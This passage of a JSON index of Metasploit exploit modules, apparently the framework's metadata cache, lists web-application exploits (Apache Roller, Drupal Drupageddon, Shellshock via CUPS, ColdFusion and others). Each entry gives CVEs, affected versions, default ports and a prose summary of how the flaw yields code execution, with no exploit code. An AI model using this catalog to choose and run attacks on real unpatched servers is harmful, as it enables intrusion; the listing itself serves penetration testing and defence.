"disclosure_date": "2013-10-31",
"type": "exploit",
"author": [
"Unknown",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits an OGNL injection vulnerability in Apache Roller < 5.0.2. The\n vulnerability is due to an OGNL injection on the UIAction controller because of an\n insecure usage of the ActionSupport.getText method. This module has been tested\n successfully on Apache Roller 5.0.1 on Ubuntu 10.04.",
"references": [
"CVE-2013-4212",
"URL-http://security.coverity.com/advisory/2013/Oct/remote-code-execution-in-apache-roller-via-ognl-injection.html"
],
"platform": "Java",
"arch": "java",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Apache Roller 5.0.1"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/apache_roller_ognl_injection.rb",
"is_install_path": true,
"ref_name": "multi/http/apache_roller_ognl_injection",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/apprain_upload_exec": {
"name": "appRain CMF Arbitrary PHP File Upload Vulnerability",
"full_name": "exploit/multi/http/apprain_upload_exec",
"rank": 600,
"disclosure_date": "2012-01-19",
"type": "exploit",
"author": [
"EgiX",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a vulnerability found in appRain's Content Management\n Framework (CMF), version 0.1.5 or less. By abusing the uploadify.php file, a\n malicious user can upload a file to the uploads/ directory without any\n authentication, which results in arbitrary code execution.",
"references": [
"CVE-2012-1153",
"OSVDB-78473",
"EDB-18392",
"BID-51576"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"appRain 0.1.5 or less"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/apprain_upload_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/apprain_upload_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/atutor_sqli": {
"name": "ATutor 2.2.1 SQL Injection / Remote Code Execution",
"full_name": "exploit/multi/http/atutor_sqli",
"rank": 600,
"disclosure_date": "2016-03-01",
"type": "exploit",
"author": [
"mr_me <steventhomasseeley@gmail.com>"
],
"description": "This module exploits a SQL Injection vulnerability and an authentication weakness\n vulnerability in ATutor. This essentially means an attacker can bypass authentication\n and reach the administrator's interface where they can upload malicious code.",
"references": [
"CVE-2016-2555",
"URL-http://www.atutor.ca/",
"URL-http://sourceincite.com/research/src-2016-08/"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/atutor_sqli.rb",
"is_install_path": true,
"ref_name": "multi/http/atutor_sqli",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/auxilium_upload_exec": {
"name": "Auxilium RateMyPet Arbitrary File Upload Vulnerability",
"full_name": "exploit/multi/http/auxilium_upload_exec",
"rank": 600,
"disclosure_date": "2012-09-14",
"type": "exploit",
"author": [
"DaOne",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a vulnerability found in Auxilium RateMyPet. The site\n banner uploading feature can be abused to upload an arbitrary file to the web\n server, which is accessible in the 'banner' directory, thus allowing remote code\n execution.",
"references": [
"OSVDB-85554",
"EDB-21329"
],
"platform": "Linux,PHP",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Generic (PHP Payload)",
"Linux x86"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/auxilium_upload_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/auxilium_upload_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/axis2_deployer": {
"name": "Axis2 / SAP BusinessObjects Authenticated Code Execution (via SOAP)",
"full_name": "exploit/multi/http/axis2_deployer",
"rank": 600,
"disclosure_date": "2010-12-30",
"type": "exploit",
"author": [
"Joshua Abraham <jabra@rapid7.com>",
"Chris John Riley"
],
"description": "This module logs in to an Axis2 Web Admin Module instance using a specific user/pass\n and uploads and executes commands via deploying a malicious web service by using SOAP.",
"references": [
"URL-http://www.rapid7.com/security-center/advisories/R7-0037.jsp",
"URL-http://spl0it.org/files/talks/source_barcelona10/Hacking%20SAP%20BusinessObjects.pdf",
"CVE-2010-0219",
"OSVDB-68662"
],
"platform": "Java,Linux,Windows",
"arch": "",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Java",
"Windows Universal",
"Linux X86"
],
"mod_time": "2018-08-09 23:34:03 +0000",
"path": "/modules/exploits/multi/http/axis2_deployer.rb",
"is_install_path": true,
"ref_name": "multi/http/axis2_deployer",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_multi/http/bassmaster_js_injection": {
"name": "Bassmaster Batch Arbitrary JavaScript Injection Remote Code Execution",
"full_name": "exploit/multi/http/bassmaster_js_injection",
"rank": 600,
"disclosure_date": "2016-11-01",
"type": "exploit",
"author": [
"mr_me <mr_me@offensive-security.com>",
"Jarda Kotesovec"
],
"description": "This module exploits an unauthenticated code injection vulnerability in the bassmaster\n nodejs plugin for hapi. The vulnerability is within the batch endpoint and allows an\n attacker to dynamically execute JavaScript code on the server side using an eval.\n\n Note that the code uses a '\\x2f' character so that we hit the match on the regex.",
"references": [
"CVE-2014-7205",
"URL-https://nodesecurity.io/advisories/bassmaster_js_injection"
],
"platform": "BSD,Linux",
"arch": "x86, x64",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Bassmaster <= 1.5.1"
],
"mod_time": "2017-12-18 03:55:01 +0000",
"path": "/modules/exploits/multi/http/bassmaster_js_injection.rb",
"is_install_path": true,
"ref_name": "multi/http/bassmaster_js_injection",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/bolt_file_upload": {
"name": "CMS Bolt File Upload Vulnerability",
"full_name": "exploit/multi/http/bolt_file_upload",
"rank": 600,
"disclosure_date": "2015-08-17",
"type": "exploit",
"author": [
"Tim Coen",
"Roberto Soares Espreto <robertoespreto@gmail.com>"
],
"description": "Bolt CMS contains a flaw that allows an authenticated remote\n attacker to execute arbitrary PHP code. This module was\n tested on version 2.2.4.",
"references": [
"CVE-2015-7309",
"URL-http://blog.curesec.com/article/blog/Bolt-224-Code-Execution-44.html"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Bolt 2.2.4"
],
"mod_time": "2018-07-12 17:34:52 +0000",
"path": "/modules/exploits/multi/http/bolt_file_upload.rb",
"is_install_path": true,
"ref_name": "multi/http/bolt_file_upload",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/builderengine_upload_exec": {
"name": "BuilderEngine Arbitrary File Upload Vulnerability and execution",
"full_name": "exploit/multi/http/builderengine_upload_exec",
"rank": 600,
"disclosure_date": "2016-09-18",
"type": "exploit",
"author": [
"metanubix",
"Marco Rivoli"
],
"description": "This module exploits a vulnerability found in BuilderEngine 3.5.0\n via elFinder 2.0. The jquery-file-upload plugin can be abused to upload a malicious\n file, which would result in arbitrary remote code execution under the context of\n the web server.",
"references": [
"EDB-40390"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"BuilderEngine 3.5.0"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/builderengine_upload_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/builderengine_upload_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/caidao_php_backdoor_exec": {
"name": "China Chopper Caidao PHP Backdoor Code Execution",
"full_name": "exploit/multi/http/caidao_php_backdoor_exec",
"rank": 600,
"disclosure_date": "2015-10-27",
"type": "exploit",
"author": [
"Nixawk"
],
"description": "This module takes advantage of the China Chopper Webshell that is\n commonly used by Chinese hackers.",
"references": [
"URL-https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html",
"URL-https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-ii.html",
"URL-https://www.exploit-db.com/docs/27654.pdf",
"URL-https://www.us-cert.gov/ncas/alerts/TA15-313A"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/caidao_php_backdoor_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/caidao_php_backdoor_exec",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_multi/http/cisco_dcnm_upload": {
"name": "Cisco Prime Data Center Network Manager Arbitrary File Upload",
"full_name": "exploit/multi/http/cisco_dcnm_upload",
"rank": 600,
"disclosure_date": "2013-09-18",
"type": "exploit",
"author": [
"rgod <rgod@autistici.org>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a code execution flaw in Cisco Data Center Network Manager. The\n vulnerability exists in processImageSave.jsp, which can be abused through a directory\n traversal and a null byte injection to upload arbitrary files. The autodeploy JBoss\n application server feature is used to achieve remote code execution. This module has been\n tested successfully on Cisco Prime Data Center Network Manager 6.1(2) on Windows 2008 R2\n (64 bits).",
"references": [
"CVE-2013-5486",
"OSVDB-97426",
"ZDI-13-254",
"URL-http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20130918-dcnm"
],
"platform": "Java",
"arch": "java",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Cisco DCNM 6.1(2) / Java Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/cisco_dcnm_upload.rb",
"is_install_path": true,
"ref_name": "multi/http/cisco_dcnm_upload",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/clipbucket_fileupload_exec": {
"name": "ClipBucket beats_uploader Unauthenticated Arbitrary File Upload",
"full_name": "exploit/multi/http/clipbucket_fileupload_exec",
"rank": 600,
"disclosure_date": "2018-03-03",
"type": "exploit",
"author": [
"www.sec-consult.com",
"Touhid M.Shaikh <admin@touhidshaikh.com>"
],
"description": "This module exploits a vulnerability found in ClipBucket versions before 4.0.0 (Release 4902).\n A malicious file can be uploaded using an unauthenticated arbitrary file upload vulnerability.\n It is possible for an attacker to upload a malicious script to issue operating system commands.\n This issue is caused by improper session handling in /action/beats_uploader.php file.\n This module was tested on ClipBucket before 4.0.0 - Release 4902 on Windows 7 and Kali Linux.",
"references": [
"CVE-2018-7665",
"EDB-44250"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Clipbucket < 4.0.0 - Release 4902"
],
"mod_time": "2018-07-12 17:34:52 +0000",
"path": "/modules/exploits/multi/http/clipbucket_fileupload_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/clipbucket_fileupload_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/cmsms_showtime2_rce": {
"name": "CMS Made Simple (CMSMS) Showtime2 File Upload RCE",
"full_name": "exploit/multi/http/cmsms_showtime2_rce",
"rank": 300,
"disclosure_date": "2019-03-11",
"type": "exploit",
"author": [
"Daniele Scanu",
"Fabio Cogno"
],
"description": "This module exploits a File Upload vulnerability that leads to RCE in\n the Showtime2 module (<= 3.6.2) in CMS Made Simple (CMSMS). An authenticated\n user with the \"Use Showtime2\" privilege could exploit the vulnerability.\n\n The vulnerability exists in the Showtime2 module, where the class\n \"class.showtime2_image.php\" does not ensure that a watermark file\n has a standard image file extension (GIF, JPG, JPEG, or PNG).\n\n Tested on Showtime2 3.6.2, 3.6.1, 3.6.0, 3.5.4, 3.5.3, 3.5.2, 3.5.1, 3.5.0,\n 3.4.5, 3.4.3, 3.4.2 on CMS Made Simple (CMSMS) 2.2.9.1",
"references": [
"CVE-2019-9692",
"CWE-434",
"EDB-46546",
"URL-https://forum.cmsmadesimple.org/viewtopic.php?f=1&t=80285",
"URL-http://viewsvn.cmsmadesimple.org/diff.php?repname=showtime2&path=%2Ftrunk%2Flib%2Fclass.showtime2_image.php&rev=47"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2019-03-27 15:17:32 +0000",
"path": "/modules/exploits/multi/http/cmsms_showtime2_rce.rb",
"is_install_path": true,
"ref_name": "multi/http/cmsms_showtime2_rce",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/cmsms_upload_rename_rce": {
"name": "CMS Made Simple Authenticated RCE via File Upload/Copy",
"full_name": "exploit/multi/http/cmsms_upload_rename_rce",
"rank": 600,
"disclosure_date": "2018-07-03",
"type": "exploit",
"author": [
"Mustafa Hasen",
"Jacob Robles"
],
"description": "CMS Made Simple allows an authenticated administrator to upload a file\n and rename it to have a .php extension. The file can then be executed\n by opening the URL of the file in the /uploads/ directory.\n\n This module has been successfully tested on CMS Made Simple versions\n 2.2.5 and 2.2.7.",
"references": [
"CVE-2018-1000094",
"CWE-434",
"EDB-44976",
"URL-http://dev.cmsmadesimple.org/bug/view/11741"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Universal"
],
"mod_time": "2018-07-31 10:03:59 +0000",
"path": "/modules/exploits/multi/http/cmsms_upload_rename_rce.rb",
"is_install_path": true,
"ref_name": "multi/http/cmsms_upload_rename_rce",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/coldfusion_ckeditor_file_upload": {
"name": "Adobe ColdFusion CKEditor unrestricted file upload",
"full_name": "exploit/multi/http/coldfusion_ckeditor_file_upload",
"rank": 600,
"disclosure_date": "2018-09-11",
"type": "exploit",
"author": [
"Pete Freitag de Foundeo",
"Vahagn vah_13 Vardanian",
"Qazeer"
],
"description": "A file upload vulnerability in the CKEditor of Adobe ColdFusion 11\n (Update 14 and earlier), ColdFusion 2016 (Update 6 and earlier), and\n ColdFusion 2018 (July 12 release) allows unauthenticated remote\n attackers to upload and execute JSP files through the filemanager\n plugin.\n Tested on Adobe ColdFusion 2018.0.0.310739.",
"references": [
"CVE-2018-15961",
"BID-105314",
"URL-https://helpx.adobe.com/fr/security/products/coldfusion/apsb18-33.html"
],
"platform": "Linux,Windows",
"arch": "java",
"rport": 8500,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Java Universal"
],
"mod_time": "2019-01-10 06:39:45 +0000",
"path": "/modules/exploits/multi/http/coldfusion_ckeditor_file_upload.rb",
"is_install_path": true,
"ref_name": "multi/http/coldfusion_ckeditor_file_upload",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/coldfusion_rds": {
"name": "Adobe ColdFusion 9 Administrative Login Bypass",
"full_name": "exploit/multi/http/coldfusion_rds",
"rank": 500,
"disclosure_date": "2013-08-08",
"type": "exploit",
"author": [
"Scott Buckel",
"Mekanismen <mattias@gotroot.eu>"
],
"description": "Adobe ColdFusion 9.0, 9.0.1, 9.0.2, and 10 allow remote\n attackers to bypass authentication using the RDS component. Due to\n default settings or misconfiguration, its password can be set to an\n empty value. This allows an attacker to create a session via the RDS\n login that can be carried over to the admin web interface even though\n the passwords might be different, thereby bypassing authentication\n on the admin web interface and leading to arbitrary code execution. Tested\n on Windows and Linux with ColdFusion 9.",
"references": [
"CVE-2013-0632",
"EDB-27755",
"URL-http://www.adobe.com/support/security/bulletins/apsb13-03.html"
],
"platform": "Linux,Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Windows",
"Linux"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/coldfusion_rds.rb",
"is_install_path": true,
"ref_name": "multi/http/coldfusion_rds",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/confluence_widget_connector": {
"name": "Atlassian Confluence Widget Connector Macro Velocity Template Injection",
"full_name": "exploit/multi/http/confluence_widget_connector",
"rank": 600,
"disclosure_date": "2019-03-25",
"type": "exploit",
"author": [
"Daniil Dmitriev",
"Dmitry (rrock) Shchannikov"
],
"description": "The Widget Connector Macro is part of Atlassian Confluence Server and Data Center that\n allows embedding online videos, slideshows, photostreams and more directly into a page.\n A _template parameter can be used to inject remote Java code into a Velocity template,\n and gain code execution. Authentication is not required to exploit this vulnerability.\n By default, the Java payload will be used because it is cross-platform, but you can also\n specify which native payload you want (Linux or Windows).\n\n Confluence before version 6.6.12, from version 6.7.0 before 6.12.3, from version\n 6.13.0 before 6.13.3 and from version 6.14.0 before 6.14.2 are affected.\n\n This vulnerability was originally discovered by Daniil Dmitriev\n https://twitter.com/ddv_ua.",
"references": [
"CVE-2019-3396",
"URL-https://confluence.atlassian.com/doc/confluence-security-advisory-2019-03-20-966660264.html",
"URL-https://chybeta.github.io/2019/04/06/Analysis-for-%E3%80%90CVE-2019-3396%E3%80%91-SSTI-and-RCE-in-Confluence-Server-via-Widget-Connector/",
"URL-https://paper.seebug.org/886/"
],
"platform": "",
"arch": "",
"rport": 8090,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Java",
"Windows",
"Linux"
],
"mod_time": "2019-04-19 12:35:36 +0000",
"path": "/modules/exploits/multi/http/confluence_widget_connector.rb",
"is_install_path": true,
"ref_name": "multi/http/confluence_widget_connector",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/cups_bash_env_exec": {
"name": "CUPS Filter Bash Environment Variable Code Injection (Shellshock)",
"full_name": "exploit/multi/http/cups_bash_env_exec",
"rank": 600,
"disclosure_date": "2014-09-24",
"type": "exploit",
"author": [
"Stephane Chazelas",
"lcamtuf",
"bcoles <bcoles@gmail.com>"
],
"description": "This module exploits the Shellshock vulnerability, a flaw in how the Bash shell\n handles external environment variables. This module targets CUPS filters through\n the PRINTER_INFO and PRINTER_LOCATION variables. A valid username and password are\n required to exploit this vulnerability through CUPS.",
"references": [
"CVE-2014-6271",
"CVE-2014-6278",
"CWE-94",
"OSVDB-112004",
"EDB-34765",
"URL-https://access.redhat.com/articles/1200223",
"URL-https://seclists.org/oss-sec/2014/q3/649"
],
"platform": "Unix",
"arch": "cmd",
"rport": 631,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic Targeting"
],
"mod_time": "2019-01-10 19:19:14 +0000",
"path": "/modules/exploits/multi/http/cups_bash_env_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/cups_bash_env_exec",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
"AKA": [
"Shellshock"
]
}
},
"exploit_multi/http/cuteflow_upload_exec": {
"name": "CuteFlow v2.11.2 Arbitrary File Upload Vulnerability",
"full_name": "exploit/multi/http/cuteflow_upload_exec",
"rank": 600,
"disclosure_date": "2012-07-27",
"type": "exploit",
"author": [
"bcoles <bcoles@gmail.com>"
],
"description": "This module exploits a vulnerability in CuteFlow version 2.11.2 or prior.\n This application has an upload feature that allows an unauthenticated\n user to upload arbitrary files to the 'upload/___1/' directory\n and then execute it.",
"references": [
"URL-http://itsecuritysolutions.org/2012-07-01-CuteFlow-2.11.2-multiple-security-vulnerabilities/",
"OSVDB-84829"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic Targeting"
],
"mod_time": "2019-01-10 19:19:14 +0000",
"path": "/modules/exploits/multi/http/cuteflow_upload_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/cuteflow_upload_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/dexter_casinoloader_exec": {
"name": "Dexter (CasinoLoader) SQL Injection",
"full_name": "exploit/multi/http/dexter_casinoloader_exec",
"rank": 600,
"disclosure_date": "2014-02-08",
"type": "exploit",
"author": [
"bwall (Brian Wallace) <bwallace@cylance.com>"
],
"description": "This module exploits a vulnerability found in the command and control panel\n used to control Dexter (Point of Sale malware). This is done by accessing the\n PHP page used by bots to report in (gateway.php) which does not sanitize input.\n Input is encrypted and encoded, but the key is supplied by the bot connecting.\n The 'page' parameter is used in this case. The command and control panel designates\n a location to upload files, and can be used as a reliable location to write a\n PHP shell. Authentication is not needed to exploit this vulnerability.",
"references": [
"URL-http://www.xylibox.com/2013/08/point-of-sale-malware-infostealerdexter.html"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"CasinoLoader gateway.php"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/dexter_casinoloader_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/dexter_casinoloader_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/drupal_drupageddon": {
"name": "Drupal HTTP Parameter Key/Value SQL Injection",
"full_name": "exploit/multi/http/drupal_drupageddon",
"rank": 600,
"disclosure_date": "2014-10-15",
"type": "exploit",
"author": [
"SektionEins",
"WhiteWinterWolf",
"Christian Mehlmauer <FireFart@gmail.com>",
"Brandon Perry"
],
"description": "This module exploits the Drupal HTTP Parameter Key/Value SQL Injection\n (aka Drupageddon) in order to achieve a remote shell on the vulnerable\n instance. This module was tested against Drupal 7.0 and 7.31 (was fixed\n in 7.32).\n\n Two methods are available to trigger the PHP payload on the target:\n\n - set TARGET 0:\n Form-cache PHP injection method (default).\n This uses the SQLi to upload a malicious form to Drupal's cache,\n then triggers the cache entry to execute the payload using a POP chain.\n\n - set TARGET 1:\n User-post injection method.\n This creates a new Drupal user, adds it to the administrators group,\n enables Drupal's PHP module, grants the administrators the right to\n bundle PHP code in their posts, creates a new post containing the\n payload and previews it to trigger the payload execution.",
"references": [
"CVE-2014-3704",
"URL-https://www.drupal.org/SA-CORE-2014-005",
"URL-http://www.sektioneins.de/en/advisories/advisory-012014-drupal-pre-auth-sql-injection-vulnerability.html",
"URL-https://www.whitewinterwolf.com/posts/2017/11/16/drupageddon-revisited-a-new-path-from-sql-injection-to-remote-command-execution-cve-2014-3704/"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Drupal 7.0 - 7.31 (form-cache PHP injection method)",
"Drupal 7.0 - 7.31 (user-post PHP injection method)"
],
"mod_time": "2018-01-03 23:10:16 +0000",
"path": "/modules/exploits/multi/http/drupal_drupageddon.rb",
"is_install_path": true,
"ref_name": "multi/http/drupal_drupageddon",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/eaton_nsm_code_exec": {
"name": "Network Shutdown Module (sort_values) Remote PHP Code Injection",
"full_name": "exploit/multi/http/eaton_nsm_code_exec",
"rank": 600,
"disclosure_date": "2012-06-26",
"type": "exploit",
"author": [
"h0ng10",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a vulnerability in Eaton Network Shutdown Module\n version <= 3.21, in lib/dbtools.inc which uses unsanitized user input\n inside an eval() call. Additionally the base64 encoded user credentials\n are extracted from the database of the application. Please note that\n in order to be able to steal credentials, the vulnerable service must\n have at least one USV module (an entry in the \"nodes\" table in\n mgedb.db)",
"references": [
"OSVDB-83199",
"URL-http://secunia.com/advisories/49103/"
],
"platform": "Linux,PHP",
"arch": "php",
"rport": 4679,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Generic (PHP Payload)",
"Linux x86"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/eaton_nsm_code_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/eaton_nsm_code_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/eventlog_file_upload": {
"name": "ManageEngine Eventlog Analyzer Arbitrary File Upload",
"full_name": "exploit/multi/http/eventlog_file_upload",
"rank": 600,
"disclosure_date": "2014-08-31",
"type": "exploit",
"author": [
"h0ng10",
"Pedro Ribeiro <pedrib@gmail.com>"
],
"description": "This module exploits a file upload vulnerability in ManageEngine Eventlog Analyzer.\n The vulnerability exists in the agentUpload servlet which accepts unauthenticated\n file uploads and handles zip file contents in an insecure way. By combining both\n weaknesses a remote attacker can achieve remote code execution. This module has been\n tested successfully on versions v7.0 - v9.9 b9002 in Windows and Linux. Versions\n between 7.0 and < 8.1 are only exploitable via EAR deployment in the JBoss server,\n while versions 8.1+ are only exploitable via a JSP upload.",
"references": [
"CVE-2014-6037",
"OSVDB-110642",
"URL-https://www.mogwaisecurity.de/advisories/MSA-2014-01.txt",
"URL-https://seclists.org/fulldisclosure/2014/Aug/86"
],
"platform": "Java,Linux,Windows",
"arch": "",
"rport": 8400,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic",
"Eventlog Analyzer v7.0 - v8.0 / Java universal",
"Eventlog Analyzer v8.1 - v9.9 b9002 / Windows",
"Eventlog Analyzer v8.1 - v9.9 b9002 / Linux"
],
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/exploits/multi/http/eventlog_file_upload.rb",
"is_install_path": true,
"ref_name": "multi/http/eventlog_file_upload",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/extplorer_upload_exec": {
"name": "eXtplorer v2.1 Arbitrary File Upload Vulnerability",
"full_name": "exploit/multi/http/extplorer_upload_exec",
"rank": 600,
"disclosure_date": "2012-12-31",
"type": "exploit",
"author": [
"bcoles <bcoles@gmail.com>"
],
"description": "This module exploits an authentication bypass vulnerability in eXtplorer\n versions 2.1.0 to 2.1.2 and 2.1.0RC5 when run as a standalone application.\n This application has an upload feature that allows an authenticated user\n with administrator roles to upload arbitrary files to any writable\n directory in the web root. This module uses an authentication bypass\n vulnerability to upload and execute a file.",
"references": [
"OSVDB-88751",
"BID-57058",
"URL-http://itsecuritysolutions.org/2012-12-31-eXtplorer-v2.1-authentication-bypass-vulnerability",
"URL-http://extplorer.net/issues/105"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic Targeting"
],
"mod_time": "2019-01-10 19:19:14 +0000",
"path": "/modules/exploits/multi/http/extplorer_upload_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/extplorer_upload_exec",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_multi/http/familycms_less_exec": {
"name": "Family Connections less.php Remote Command Execution",
"full_name": "exploit/multi/http/familycms_less_exec",
"rank": 600,
"disclosure_date": "2011-11-29",
"type": "exploit",
"author": [
"mr_me <steventhomasseeley@gmail.com>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits an arbitrary command execution vulnerability in\n Family Connections 2.7.1. It's in the dev/less.php script and is due\n to an insecure use of system(). Authentication isn't required to exploit\n the vulnerability but register_globals must be set to On.",
"references": [
"CVE-2011-5130",
"OSVDB-77492",
"URL-https://www.familycms.com/blog/2011/11/security-vulnerability-fcms-2-5-2-7-1/",
"URL-http://sourceforge.net/apps/trac/fam-connections/ticket/407",
"URL-http://rwx.biz.nf/advisories/fc_cms_rce_adv.html",
"EDB-18198"
],
"platform": "Linux,Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
